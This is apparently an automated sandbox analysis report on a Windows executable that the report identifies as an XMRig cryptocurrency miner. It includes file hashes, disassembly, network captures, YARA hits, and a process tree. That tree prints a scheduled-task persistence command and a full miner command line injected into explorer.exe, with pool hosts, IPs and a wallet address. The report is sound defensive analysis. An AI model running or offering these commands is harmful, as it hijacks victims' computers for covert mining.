                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./..........`......."........@......................................|......................................................0...<...................................................................................l................................text............................... ..`.rdata..n]...0...^..................@..@.bss.....................................pdata...............x..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                        Entropy (8bit):7.999681283638092
                                                        TrID:
                                                        • Win64 Executable (generic) (12005/4) 74.80%
                                                        • Generic Win/DOS Executable (2004/3) 12.49%
                                                        • DOS Executable Generic (2002/1) 12.47%
                                                        • VXD Driver (31/22) 0.19%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                        File name:pcNCraWcRk.exe
                                                        File size:2234368
                                                        MD5:0958fa69ba0e6645c42215c5325d8f76
                                                        SHA1:800666827e118ce78aef55c47864512ef9d3b7a6
                                                        SHA256:1b0c9f3f22d25cd518e480798ee44e8876107b2d37b2e92997c039d4a6c69db1
                                                        SHA512:95f582f9b45325951fe4cdc40cd5ae1037a955e437c052c64186641785f8170c7c9cb9532756166e267f0398217991c616ad86115ebb8d0b183898887950cc28
                                                        SSDEEP:24576:1drStRzAeuEl5IJw6mgjogJlV50mtIJfBaH1NUqGCnW1lm/SIwDIGPvarynWZqJ3:LGRUEIRPlVydBLCelDI1m0yBJSXM/nP
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........!......"........@..............................P"......~"....................................

                                                        File Icon

                                                        Icon Hash:00828e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4022fa
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                        DLL Characteristics:
                                                        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:02549ff92b49cce693542fc9afb10102

                                                        Entrypoint Preview

                                                        Instruction
                                                        push ebp
                                                        dec eax
                                                        mov ebp, esp
                                                        dec eax
                                                        sub esp, 00000040h
                                                        dec eax
                                                        mov eax, 00000004h
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        dec ecx
                                                        mov eax, eax
                                                        mov eax, 00000000h
                                                        dec ecx
                                                        mov ebx, eax
                                                        dec eax
                                                        lea eax, dword ptr [ebp-04h]
                                                        dec ecx
                                                        mov edx, eax
                                                        dec esp
                                                        mov ecx, edx
                                                        dec esp
                                                        mov edx, ebx
                                                        call 00007FED04FB3421h
                                                        dec eax
                                                        lea eax, dword ptr [FFFFFF98h]
                                                        dec ecx
                                                        mov edx, eax
                                                        dec esp
                                                        mov ecx, edx
                                                        call 00007FED04FB343Fh
                                                        mov eax, 00000001h
                                                        dec ecx
                                                        mov edx, eax
                                                        dec esp
                                                        mov ecx, edx
                                                        call 00007FED04FB3437h
                                                        mov eax, 00030000h
                                                        dec ecx
                                                        mov ebx, eax
                                                        mov eax, 00010000h
                                                        dec ecx
                                                        mov edx, eax
                                                        dec esp
                                                        mov ecx, edx
                                                        dec esp
                                                        mov edx, ebx
                                                        call 00007FED04FB3424h
                                                        dec eax
                                                        mov eax, dword ptr [00220624h]
                                                        dec eax
                                                        mov ecx, dword ptr [00220625h]
                                                        dec eax
                                                        mov edx, dword ptr [00220626h]
                                                        dec eax
                                                        mov dword ptr [ebp-10h], eax
                                                        dec eax
                                                        lea eax, dword ptr [ebp-04h]
                                                        dec eax
                                                        mov dword ptr [esp+20h], eax
                                                        mov eax, dword ptr [00221C17h]
                                                        dec ecx
                                                        mov ecx, eax
                                                        dec ecx
                                                        mov eax, edx
                                                        dec ecx
                                                        mov ebx, ecx
                                                        dec eax
                                                        mov eax, dword ptr [ebp-10h]
                                                        dec ecx
                                                        mov edx, eax
                                                        dec esp
                                                        mov ecx, edx
                                                        dec esp
                                                        mov edx, ebx
                                                        call 00007FED04FB33E9h
                                                        dec eax
                                                        mov eax, dword ptr [002205E1h]
                                                        dec eax
                                                        mov ecx, dword ptr [002205E2h]
                                                        dec eax
                                                        mov edx, dword ptr [002205E3h]

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2229300x3c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2240000x90.pdata
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x22296c0x90.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x14e00x1600False0.327414772727data5.39828227973IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rdata0x30000x21fb6e0x21fc00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .bss0x2230000xfac0x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .pdata0x2240000x900x200False0.17578125data1.20871562712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Imports

                                                        DLLImport
                                                        msvcrt.dllmalloc, memset, _get_pgmptr, getenv, sprintf, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
                                                        kernel32.dllSleep, CreateProcessA, SetUnhandledExceptionFilter

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 1, 2021 18:20:34.654522896 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:20:34.802129984 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:20:34.802308083 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:20:34.802676916 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:20:34.949754000 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:20:34.952109098 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:20:35.006928921 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:20:58.889048100 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:20:59.037017107 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:20:59.165097952 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:21:03.528681040 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:21:03.676541090 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:21:03.852927923 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:21:09.292006969 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:21:09.353405952 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:21:21.406594992 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:21:21.554615974 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:21:21.667011976 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:21:22.168793917 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:21:22.354504108 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:21:31.754548073 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:21:31.902127981 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:21:31.964907885 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:21:53.601584911 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:21:53.749329090 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:21:53.857152939 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:08.663139105 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:08.811105013 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:22:08.858422995 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:14.833985090 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:14.982608080 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:22:15.171436071 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:37.397836924 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:22:37.470323086 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:39.301384926 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:22:39.360992908 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:40.564130068 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:40.712826967 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:22:40.861068964 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:43.200921059 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:43.348690987 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:22:43.470679045 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:52.311743021 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:52.459568024 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:22:52.674566984 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:55.326248884 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:55.474033117 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:22:55.674835920 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:00.538438082 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:00.686855078 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:23:00.862798929 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:06.417404890 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:06.566159010 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:23:06.675754070 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:14.762794018 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:14.910789013 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:23:14.973330975 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:16.868604898 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:17.016742945 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:23:17.176672935 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:22.813848972 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:22.961983919 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:23:23.177175999 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:24.301785946 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:23:24.380407095 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:27.197225094 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:27.345983982 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:23:27.568159103 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:43.398880005 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:23:43.484649897 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:24:02.688910007 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:24:02.836719036 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:24:02.977413893 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:24:05.420484066 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:24:05.568367004 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:24:05.680722952 CET497638080192.168.2.4198.23.214.117

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 1, 2021 18:20:34.627938986 CET4925753192.168.2.48.8.8.8
                                                        Nov 1, 2021 18:20:34.650455952 CET53492578.8.8.8192.168.2.4
                                                        Nov 1, 2021 18:22:29.095741987 CET5585453192.168.2.48.8.8.8
                                                        Nov 1, 2021 18:22:29.119029999 CET53558548.8.8.8192.168.2.4

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Nov 1, 2021 18:20:34.627938986 CET192.168.2.48.8.8.80xd8f8Standard query (0)xmr.givemexyz.inA (IP address)IN (0x0001)
                                                        Nov 1, 2021 18:22:29.095741987 CET192.168.2.48.8.8.80xe55cStandard query (0)xmr.givemexyz.inA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Nov 1, 2021 18:20:34.650455952 CET8.8.8.8192.168.2.40xd8f8No error (0)xmr.givemexyz.in212.114.52.24A (IP address)IN (0x0001)
                                                        Nov 1, 2021 18:20:34.650455952 CET8.8.8.8192.168.2.40xd8f8No error (0)xmr.givemexyz.in198.23.214.117A (IP address)IN (0x0001)
                                                        Nov 1, 2021 18:20:34.650455952 CET8.8.8.8192.168.2.40xd8f8No error (0)xmr.givemexyz.in194.5.249.24A (IP address)IN (0x0001)
                                                        Nov 1, 2021 18:22:29.119029999 CET8.8.8.8192.168.2.40xe55cNo error (0)xmr.givemexyz.in198.23.214.117A (IP address)IN (0x0001)
                                                        Nov 1, 2021 18:22:29.119029999 CET8.8.8.8192.168.2.40xe55cNo error (0)xmr.givemexyz.in212.114.52.24A (IP address)IN (0x0001)
                                                        Nov 1, 2021 18:22:29.119029999 CET8.8.8.8192.168.2.40xe55cNo error (0)xmr.givemexyz.in194.5.249.24A (IP address)IN (0x0001)

                                                        Code Manipulations

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        Analysis Process: pcNCraWcRk.exe PID: 1380 Parent PID: 2848

                                                        General

                                                        Start time:18:20:03
                                                        Start date:01/11/2021
                                                        Path:C:\Users\user\Desktop\pcNCraWcRk.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Users\user\Desktop\pcNCraWcRk.exe'
                                                        Imagebase:0x400000
                                                        File size:2234368 bytes
                                                        MD5 hash:0958FA69BA0E6645C42215C5325D8F76
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low

                                                        Chronological Activities

                                                        Analysis Process: conhost.exe PID: 612 Parent PID: 1380

                                                        General

                                                        Start time:18:20:03
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe'
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: cmd.exe PID: 4564 Parent PID: 612

                                                        General

                                                        Start time:18:20:06
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
                                                        Imagebase:0x7ff622070000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: conhost.exe PID: 6176 Parent PID: 4564

                                                        General

                                                        Start time:18:20:07
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: schtasks.exe PID: 6456 Parent PID: 4564

                                                        General

                                                        Start time:18:20:08
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
                                                        Imagebase:0x7ff6de4a0000
                                                        File size:226816 bytes
                                                        MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: services64.exe PID: 3496 Parent PID: 968

                                                        General

                                                        Start time:18:20:09
                                                        Start date:01/11/2021
                                                        Path:C:\Users\user\AppData\Local\Temp\services64.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\AppData\Local\Temp\services64.exe
                                                        Imagebase:0x400000
                                                        File size:2234368 bytes
                                                        MD5 hash:0958FA69BA0E6645C42215C5325D8F76
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 65%, Virustotal, Browse
                                                        • Detection: 31%, Metadefender, Browse
                                                        • Detection: 81%, ReversingLabs
                                                        Reputation:low

                                                        Chronological Activities

                                                        Analysis Process: conhost.exe PID: 5252 Parent PID: 3496

                                                        General

                                                        Start time:18:20:10
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.847002769.000002C950221000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.849031612.000002C960EA6000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000009.00000003.709450089.000002C968F90000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.709450089.000002C968F90000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000009.00000003.717098920.000002C968F90000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.717098920.000002C968F90000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000009.00000003.708284013.000002C968F90000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.708284013.000002C968F90000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.847850368.000002C9604A6000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: cmd.exe PID: 5140 Parent PID: 612

                                                        General

                                                        Start time:18:20:11
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe'
                                                        Imagebase:0x7ff622070000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: conhost.exe PID: 6680 Parent PID: 5140

                                                        General

                                                        Start time:18:20:11
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: services64.exe PID: 6756 Parent PID: 5140

                                                        General

                                                        Start time:18:20:12
                                                        Start date:01/11/2021
                                                        Path:C:\Users\user\AppData\Local\Temp\services64.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\AppData\Local\Temp\services64.exe
                                                        Imagebase:0x400000
                                                        File size:2234368 bytes
                                                        MD5 hash:0958FA69BA0E6645C42215C5325D8F76
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low

                                                        Chronological Activities

                                                        Analysis Process: sihost64.exe PID: 5264 Parent PID: 5252

                                                        General

                                                        Start time:18:20:13
                                                        Start date:01/11/2021
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe'
                                                        Imagebase:0x400000
                                                        File size:31232 bytes
                                                        MD5 hash:2497F634A80476AE2EAE956D8B84528E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 49%, Metadefender, Browse
                                                        • Detection: 82%, ReversingLabs
                                                        Reputation:low

                                                        Chronological Activities

                                                        Analysis Process: conhost.exe PID: 5952 Parent PID: 6756

                                                        General

                                                        Start time:18:20:13
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.732288392.000002A7830D1000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000000F.00000003.719582086.000002A79BBD0000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000003.719582086.000002A79BBD0000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: conhost.exe PID: 5932 Parent PID: 5264

                                                        General

                                                        Start time:18:20:13
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\System32\conhost.exe' '/sihost64'
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: explorer.exe PID: 6784 Parent PID: 5952

                                                        General

                                                        Start time:18:20:18
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
                                                        Imagebase:0x7ff6fee60000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.728856594.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.723918666.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.726457226.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
